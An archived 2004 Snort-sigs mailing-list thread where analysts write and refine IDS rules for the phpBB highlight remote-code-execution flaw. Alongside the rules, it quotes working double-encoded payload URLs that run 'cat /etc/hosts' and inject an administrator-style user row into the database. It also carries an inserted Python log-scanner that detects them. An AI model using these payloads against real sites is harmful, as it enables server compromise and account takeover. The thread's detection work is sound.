    [Snort-sigs] phpBB remote code execution detection rule (final)  
Federico Petronio


12-01-04 12:45 PM

Hello, this rule is intended to detect the recently discovered remote
code execution bug. It is similar to rule 2001457, but there are some
attacks I tested that that rule does not detect and this one does (e.g.
viewtopic.php?t=2&highlight=%2527%252esystem(chr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(47)%252echr(101)%252echr(116)%252echr(99)%252echr(47)%252echr(104)%252echr(111)%252echr(115)%252echr(116)%252echr(115))%252e%2527))

Rule:

drop tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"phpBB <=
2.0.10 Remote code execution"; content:"/viewtopic.php?"; content:"t=";
content:"highlight="; content:"system";
reference:url,secunia.com/advisories/13239;
classtype:web-application-attack; sid:100100; rev:1;)

Reference:
http://secunia.com/advisories/13239

Thanks...
--
Federico Petronio
petrus@activesec.biz








-------------------------------------------------------
SF email is sponsored by - The IT Product Guide
Read honest & candid reviews on hundreds of IT Products from real users.
Discover which products truly live up to the hype. Start reading now.
http://productguide.itmanagersjournal.com/
 ________________________________________
_______
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs








    Re: [Snort-sigs] phpBB remote code execution detection rule (final)  
Alex Kirk


12-01-04 10:46 PM

Federico,

You might want to have an additional rule that uses uricontent instead
of content, to deal with obfuscated GET requests such as:

http://<victim>/%76%69%65%77%74%6F%70%69%63.php?%74=2&%68%69%67%68%6C%69%67%68%74=...

Also, consider using distance:0 as a modifier to your content:"system"
match if, as seems to be implied here, system will always be part of the
value of the highlight parameter. This will force Snort to find "system"
after "highlight=", adding a nice validity check to your detection.

Alex Kirk
Research Analyst
Sourcefire, Inc.

    RE: [Snort-sigs] phpBB remote code execution detection rule (final)  
hchemin@godaddy.com


12-01-04 10:46 PM

This rule will only catch system command execution attempts and not
SQL injection. The following is an example of SQL injection:

http://victim.com/phpbb2/viewtopic.php?t=1&highlight=%2527%252emysql_query(chr(73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)%252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(50)%252echr(95)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32)%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%252echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108)%252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%252echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252echr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)%252echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252echr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(41))%252e%2527

Harry Chemin, CISSP
Senior IT Security Analyst
Go Daddy Software
14455 North Hayden Road, Suite 226, Scottsdale, AZ 85260
480-505-8800 ext. 4194



    RE: [Snort-sigs] phpBB remote code execution detection rule (final)  
M. Shirk


12-01-04 10:46 PM

This link describes an attack that adds an admin user to any vulnerable
phpBB forum using some of the content you described.
http://www.securiteam.com/unixfocus/6Z00R2ABPY.html

The 2001457 rule is just hunting the /'.system(/ so no matter what command
is attempted it should trigger. I tested by sending an ls command to a
forum:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE
phpBB Highlighting Remote Code Execution Attempt HowDark.com";
flow:to_server,established; uricontent:"/viewtopic.php?t="; nocase;
uricontent:"&highlight='.system("; nocase;
reference:url,www.howdark.com/poc/phpbb2010_hl.phps; sid:2001457; rev:4;)


Shirkdog
http://www.shirkdog.us




    RE: [Snort-sigs] phpBB remote code execution detection rule (final)  
M. Shirk


12-01-04 10:46 PM

>From: hchemin@godaddy.com
>To: "M. Shirk" <shirkdog_list@hotmail.com>
>Subject: RE: [Snort-sigs] phpBB remote code execution detection rule
>(final)
>Date: Wed,  1 Dec 2004 11:10:50 -0700
>
>viewtopic.php?t=#&highlight=%2527%252emysql_query
>I was able to replicate and exploit a test site running 2.08 version of
>phpbb

Ok, we just need to change the uricontent to look for the php function
mysql_query:

Try this:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE
phpBB Highlighting SQL Injection <2.0.11";
flow:to_server,established; uricontent:"/viewtopic.php?t="; nocase;
uricontent:"&highlight='.mysql_query("; nocase;
reference:url,www.securiteam.com/unixfocus/6Z00R2ABPY.html; sid:2001999;
rev:1;)

Shirkdog
http://www.shirkdog.us
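As an added example (my own script, not code posted by anyone in this thread and not a Snort rule), the Python below shows what Alex's uricontent suggestion buys and what Shirk's 2001457 and 2001999 patterns key on. It decodes a request target once, as a URI normalizer does, so a percent-encoded path and parameter name like the one Alex quotes still come out as /viewtopic.php and highlight; it then looks for the '.system( and '.mysql_query( markers in the highlight value, accepting the quote and the dot either literally or still encoded, because the double-encoded %2527%252e payloads in this thread become %27%2e after one decoding round and '. only after a second one (phpBB runs its own urldecode() over highlight, which is why the payloads are encoded twice). The access-log lines are constructed for the demonstration; the regexes, function names and log format are this example's own assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Markers from the thread's rules: sid 2001457 looks for '.system( and
# sid 2001999 for '.mysql_query(. The quote and the dot are accepted either
# literally or still percent-encoded (%27 / %2e), so the pattern matches the
# double-encoded payloads after one decoding round as well as after two.
INJECTION = re.compile(r"(?:'|%27)(?:\.|%2e)(system|mysql_query)\s*\(", re.I)

# Apache-style access-log line; only the request target is needed here.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')

# Constructed sample log lines (not real traffic): a benign search, the
# double-encoded highlight payload, the same payload with the path and the
# parameter names percent-encoded as well, and a mysql_query variant.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Dec/2004:12:45:00 +0000] "GET /phpbb2/viewtopic.php'
    '?t=2&highlight=snort HTTP/1.1" 200 5123',
    '10.0.0.6 - - [01/Dec/2004:12:46:00 +0000] "GET /phpbb2/viewtopic.php'
    '?t=2&highlight=%2527%252esystem(chr(108)%252echr(115))%252e%2527 HTTP/1.1" 200 5123',
    '10.0.0.7 - - [01/Dec/2004:12:47:00 +0000] "GET /phpbb2/%76%69%65%77%74%6F%70%69%63.php'
    '?%74=2&%68%69%67%68%6C%69%67%68%74=%2527%252esystem(chr(108)%252echr(115))%252e%2527 HTTP/1.1" 200 5123',
    '10.0.0.8 - - [01/Dec/2004:12:48:00 +0000] "GET /phpbb2/viewtopic.php'
    '?t=1&highlight=%2527%252emysql_query(chr(83))%252e%2527 HTTP/1.1" 200 5123',
]


def decode_once(raw_uri):
    """One round of percent-decoding over path and query, as a URI normalizer
    does before uricontent-style matching. Returns (path, params); each value
    is a list, and escapes that were themselves encoded (%2527 -> %27) survive
    this round."""
    path, _, query = raw_uri.partition("?")
    return unquote(path), parse_qs(query, keep_blank_values=True)


def inspect_uri(raw_uri):
    """Classify one request target: normalized path, the highlight value after
    one and after two decoding rounds, and the PHP function the injection
    pattern matched (None when clean)."""
    path, params = decode_once(raw_uri)
    highlight = params.get("highlight", [""])[0]
    match = INJECTION.search(highlight)
    return {
        "path": path,
        "highlight_once": highlight,
        "highlight_twice": unquote(highlight),  # what phpBB's urldecode() sees
        "function": match.group(1).lower() if match else None,
    }


def scan_log(lines):
    """Run inspect_uri over access-log lines and return (line_number, function)
    for every viewtopic.php request whose highlight value matched."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        result = inspect_uri(m.group(1))
        if result["path"].endswith("/viewtopic.php") and result["function"]:
            hits.append((n, result["function"]))
    return hits


if __name__ == "__main__":
    for n, line in enumerate(SAMPLE_LOG, 1):
        r = inspect_uri(REQUEST.search(line).group(1))
        print(f"line {n}: path={r['path']} function={r['function']}")
        print(f"  once : {r['highlight_once']}")
        print(f"  twice: {r['highlight_twice']}")
    print("hits:", scan_log(SAMPLE_LOG))
```

Running it prints, for line 2, `once: %27%2esystem(chr(108)%2echr(115))%2e%27` and `twice: '.system(chr(108).chr(115)).'`, which is the practical point: a literal `'.system(` only exists after the second decoding round, so a detector has to either decode twice or, as the pattern here does, accept the encoded forms of the quote and the dot. Line 3, with every byte of the path and parameter names percent-encoded, normalizes to the same path and the same highlight value as line 2.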

    Re: [Snort-sigs] phpBB remote code execution detection rule (final)  
Tony Blackmon


12-01-04 10:46 PM

I got it. I see now: I went back to their site and they were able to make it
work, modified the first statement they made and released a fix for it.

Guess I should pay more attention ;)


